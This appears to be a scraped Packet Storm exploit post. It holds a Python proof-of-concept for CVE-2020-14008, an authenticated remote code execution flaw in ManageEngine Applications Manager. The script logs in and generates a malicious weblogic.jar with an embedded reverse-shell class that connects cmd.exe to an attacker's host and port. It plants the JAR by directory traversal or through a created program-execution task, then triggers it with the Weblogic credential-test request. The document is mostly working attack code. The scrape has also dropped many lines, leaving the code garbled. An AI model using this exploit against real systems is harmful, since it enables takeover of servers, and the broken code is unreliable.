
Published on September 4th, 2020 📆 | 5985 Views ⚑


ManageEngine Applications Manager Authenticated Remote Code Execution ≈ Packet Storm

[*]#!/usr/bin/python3[*]# Exploit Title: ManageEngine Applications Manager - Authenticated RCE via Java class reflection in Weblogic server test credential API
# Google Dork: None
# Date: 04-09-2020
# Exploit Author: Hodorsec
# Vendor Homepage: https://manageengine.co.uk
# Vendor Vulnerability Description: https://manageengine.co.uk/products/applications_manager/security-updates/security-updates-cve-2020-14008.html
# Software Link: http://archives.manageengine.com/applications_manager/14720/
# Version: Until version 14720
# Tested on: version 12900 and version 14700
# CVE : CVE-2020-14008[*]# Summary:
# POC for proving ability to execute malicious Java code in uploaded JAR file as an Oracle Weblogic library to connect to Weblogic servers
# Exploits the newInstance() and loadClass() methods being used by the "WeblogicReference", when attempting a Credential Test for a new Monitor
# When invoking the Credential Test, a call is being made to lookup a possibly existing "weblogic.jar" JAR file, using the "weblogic.jndi.Environment" class and method[*]# Vulnerable code:
# Lines 129 - 207 in com/adventnet/appmanager/server/wlogic/statuspoll/WeblogicReference.java
# 129 /* */ public static MBeanServer lookupMBeanServer(String hostname, String portString, String username, String password, int version) throws Exception {
# 130 /* 130 */ ClassLoader current = Thread.currentThread().getContextClassLoader();
# 131 /* */ try {
# 132 /* 132 */ boolean setcredentials = false;
# 133 /* 133 */ String url = "t3://" + hostname + ":" + portString;
# 134 /* 134 */ JarLoader jarLoader = null;
# 135 /* */
# ........
# 143 /* */ }
# 144 /* 144 */ else if (version == 8)
# 145 /* */ {
# 146 /* 146 */ if (new File("./../working/classes/weblogic/version8/weblogic.jar").exists())
# 147 /* */ {
# 148 /* */
# 149 /* 149 */ jarLoader = new JarLoader("." + File.separator + ".." + File.separator + "working" + File.separator + "classes" + File.separator + "weblogic" + File.separator + "version8" + File.separator + "weblogic.jar");
# 150 /* */
# ....
# 170 /* 170 */ Thread.currentThread().setContextClassLoader(jarLoader);
# 171 /* 171 */ Class cls = jarLoader.loadClass("weblogic.jndi.Environment");
# 172 /* 172 */ Object env = cls.newInstance();[*]# Example call for MAM version 12900:
# $ python3 poc_mam_weblogic_upload_and_exec_jar.py admin admin weblogic.jar
# [*] Visiting page to retrieve initial cookies...
# [*] Retrieving admin cookie...
# [*] Getting base directory of ManageEngine...
# [*] Found base directory: C:Program Files (x86)ManageEngineAppManager12
# [*] Creating JAR file...
# Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
# Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
# added manifest
# adding: weblogic/jndi/Environment.class(in = 1844) (out= 1079)(deflated 41%)
# [*] Uploading JAR file...
# [*] Attempting to upload JAR directly to targeted Weblogic folder...
# [*] Copied successfully via Directory Traversal, jumping directly to call vulnerable function!
# [*] Running the Weblogic credentialtest which triggers the code in the JAR...
# [*] Check your shell...[*]# Function flow:
# 1. Get initial cookie
# 2. Get valid session cookie by logging in
# 3. Get base directory of installation
# 4. Generate a malicious JAR file
# 5. Attempt to directly upload JAR, if success, jump to 7
# 6. Create task with random ID to copy JAR file to expected Weblogic location
# 7. Execute task
# 8. Delete task for cleanup
# 9. Run the vulnerable credentialTest, using the malicious JAR[*]import requests
import urllib3
import shutil
import subprocess
import os
import sys
import random
import re
from lxml import html[*]# Optionally, use a proxy
# proxy = "http://:@:"
proxy = ""
os.environ['http_proxy'] = proxy
os.environ['HTTP_PROXY'] = proxy
os.environ['https_proxy'] = proxy
os.environ['HTTPS_PROXY'] = proxy[*]# Disable cert warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)[*]# Set timeout
timeout = 10[*]# Handle CTRL-C
def keyboard_interrupt():
"""Handles keyboardinterrupt exceptions"""
print("nn[*] User requested an interrupt, exiting...")
exit(0)[*]# Custom headers
def http_headers():
headers = {
'User-Agent': 'Mozilla',
return headers[*]def get_initial_cookie(url,headers):
print("[*] Visiting page to retrieve initial cookies...")
target = url + "/index.do"
r = requests.get(target,headers=headers,timeout=timeout,verify=False)
return r.cookies[*]def get_valid_cookie(url,headers,initial_cookies,usern,passw):
print("[*] Retrieving admin cookie...")
appl_cookie = "JSESSIONID_APM_9090"
post_data = {'clienttype':'html',
target = url + "/j_security_check"
r = requests.post(target,data=post_data,headers=headers,cookies=initial_cookies,timeout=timeout,verify=False)
res = r.text
if "Server responded in " in res:
return r.cookies
print("[!] No valid response from used session, exiting!n")
exit(-1)[*]def get_base_dir(url,headers,valid_cookie):
print("[*] Getting base directory of ManageEngine...")
target = url + "/common/serverinfo.do"
params = {'service':'AppManager',
r = requests.get(target,params=params,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False)
tree = html.fromstring(r.content)
pathname = tree.xpath('//table[@class="lrbtborder"]/tr[6]/td[2]/@title')
base_dir = pathname[0]
print("[*] Found base directory: " + base_dir)
return base_dir[*]def create_jar(command,jarname,revhost,revport):
print("[*] Creating JAR file...")
# Variables
classname = "Environment"
pkgname = "weblogic.jndi"
fullname = pkgname + "." + classname
manifest = "MANIFEST.MF"[*]# Directory variables
curdir = os.getcwd()
metainf_dir = "META-INF"
maindir = "weblogic"
subdir = maindir + "/jndi"
builddir = curdir + "/" + subdir[*]# Check if directory exist, else create directory
if os.path.isdir(builddir):
except OSError:
print("[!] Error creating local directory "" + builddir + "", check permissions...")
exit(-1)[*]# Creating the text file using given parameters
javafile = '''package ''' + pkgname + ''';[*]import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
import java.util.concurrent.TimeUnit;[*]public class ''' + classname + ''' {[*]// This method is being called by lookupMBeanServer() in com/adventnet/appmanager/server/wlogic/statuspoll/WeblogicReference.java
// Uses the jarLoader.loadClass() method to load and initiate a new instance via newInstance()
public void setProviderUrl(String string) throws Exception {
System.out.println("Hello from setProviderUrl()");
}[*]// Normal main() entry
public static void main(String args[]) throws Exception {
System.out.println("Hello from main()");
// Added delay to notice being called from main()
}[*]// Where the magic happens
public static void connect() throws Exception {
String host = "''' + revhost + '''";
int port = ''' + str(revport) + ''';
String[] cmd = {"''' + command + '''"};[*]Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
po.flush();[*]try {
catch (Exception e){
}[*]}'''[*]# Output file to desired directory
print(javafile,file=open(classname + ".java","w"))[*]# Go to previous directory to create JAR file
os.chdir(curdir)[*]# Create the compiled .class file
cmdCompile = "javac --release 7 " + subdir + "/*.java"
process = subprocess.call(cmdCompile,shell=True)[*]# Creating Manifest file
if os.path.isdir(metainf_dir):
except OSError:
print("[!] Error creating local directory "" + metainf_dir + "", check permissions...")
print("Main-Class: " + fullname,file=open(metainf_dir + "/" + manifest,"w"))[*]# Create JAR file
cmdJar = "jar cmvf " + metainf_dir + "/" + manifest + " " + jarname + " " + subdir + "/*.class"
process = subprocess.call(cmdJar,shell=True)[*]# Cleanup directories
print("[!] Error while cleaning up directories.")
return True[*]def upload_jar(url,headers,valid_cookie,jarname,rel_path):
print("[*] Uploading JAR file...")
target = url + "/Upload.do"
path_normal = './'
path_trav = rel_path
jar = {'theFile':(jarname,open(jarname, 'rb'))}
print("[*] Attempting to upload JAR directly to targeted Weblogic folder...")
post_data = {'uploadDir':path_trav}
r_upload = requests.post(target, data=post_data, headers=headers, files=jar, cookies=valid_cookie, timeout=timeout,verify=False)
res = r_upload.text
if "successfully uploaded" not in res:
print("[!] Failed to upload JAR directly, continue to add and execute job to move JAR...")
post_data = {'uploadDir':path_normal}
jar = {'theFile':(jarname,open(jarname, 'rb'))}
r_upload = requests.post(target, data=post_data, headers=headers, files=jar, cookies=valid_cookie, timeout=timeout,verify=False)
return "normal_path"
print("[*] Copied successfully via Directory Traversal, jumping directly to call vulnerable function!")
return "trav_path"[*]def create_task(url,headers,valid_cookie,action_name,rel_path,work_dir):
print("[*] Creating a task to move the JAR file to relative path: " + rel_path + "...")
valid_resp = "Execute Program succesfully created."
target = url + "/adminAction.do"
post_data = {'actions':'/adminAction.do?method=showExecProgAction&haid=null',
'command':'move weblogic.jar ' + rel_path,
r = requests.post(target,data=post_data,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False)
res = r.text
found_id = ""
if action_name in res:
tree = html.fromstring(r.content)
actionurls = tree.xpath('//table[@id="executeProgramActionTable"]/tr[@class="actionsheader"]/td[2]/a/@onclick')
actionnames = tree.xpath('//table[@id="executeProgramActionTable"]/tr[@class="actionsheader"]/td[2]/a/text()')[*]i = 0
for name in actionnames:
for url in actionurls:
if action_name in name:
found_id = re.search(".*actionid=(.+?)','", actionurls[i]).group(1)
print("[*] Found actionname: " + action_name + " with found actionid " + found_id)
return found_id
print("[!] Actionname not found. Task probably wasn't created, please check. Exiting.")
exit(-1)[*]def exec_task(url,headers,valid_cookie,found_id):
print("[*] Executing created task with id: " + found_id + " to copy JAR...")
valid_resp = "has been successfully executed"
target = url + "/common/executeScript.do"
params = {'method':'testAction',
r = requests.get(target,params=params,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False)
res = r.text
if valid_resp in res:
print("[*] Task " + found_id + " has been executed successfully")
print("[!] Task not executed. Check requests, exiting...")
return[*]def del_task(url,headers,valid_cookie,found_id):
print("[*] Deleting created task as JAR has been copied...")
target = url + "/adminAction.do"
params = {'method':'deleteProgExecAction'}
post_data = {'haid':'null',
r = requests.post(target,params=params,data=post_data,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False)[*]def run_credtest(url,headers,valid_cookie):
print("[*] Running the Weblogic credentialtest which triggers the code in the JAR...")
target = url + "/testCredential.do"
post_data = {'method':'testCredentialForConfMonitors',
'groupname':''}[*]print("[*] Check your shell...")
return[*]# Main
def main(argv):
if len(sys.argv) == 6:
url = sys.argv[1]
usern = sys.argv[2]
passw = sys.argv[3]
revhost = sys.argv[4]
revport = sys.argv[5]
print("[*] Usage: " + sys.argv[0] + " ")
print("[*] Example: " + sys.argv[0] + " admin admin 6666n")
exit(0)[*]# Do stuff
# Set HTTP headers
headers = http_headers()[*]# Relative path to copy the malicious JAR file
rel_path = "classes/weblogic/version8/"
# Generate a random ID to use for the task name and task tracking
random_id = str(random.randrange(0000,9999))
# Action_name used for displaying actions in overview
action_name = "move_weblogic_jar" + random_id
# Working dir to append to base dir
base_append = "\working\"
# Name for JAR file to use
jarname = "weblogic.jar"
# Command shell to use
cmd = "cmd.exe"[*]# Execute functions
initial_cookies = get_initial_cookie(url,headers)
valid_cookie = get_valid_cookie(url,headers,initial_cookies,usern,passw)
work_dir = get_base_dir(url,headers,valid_cookie) + base_append
status_jar = upload_jar(url,headers,valid_cookie,jarname,rel_path)[*]# Check if JAR can be uploaded via Directory Traversal
# If so, no need to add and exec actions; just run the credentialtest directly
if status_jar == "trav_path":
# Cannot be uploaded via Directory Traversal, add and exec actions to move JAR. Lastly, run the vulnerable credentialtest
elif status_jar == "normal_path":
found_id = create_task(url,headers,valid_cookie,action_name,rel_path,work_dir)
run_credtest(url,headers,valid_cookie)[*]except requests.exceptions.Timeout:
print("[!] Timeout errorn")
except requests.exceptions.TooManyRedirects:
print("[!] Too many redirectsn")
except requests.exceptions.ConnectionError:
print("[!] Not able to connect to URLn")
except requests.exceptions.RequestException as e:
print("[!] " + e)
except requests.exceptions.HTTPError as e:
print("[!] Failed with error code - " + e.code + "n")
except KeyboardInterrupt:
keyboard_interrupt()[*]# If we were called as a program, go execute the main function.
if __name__ == "__main__":
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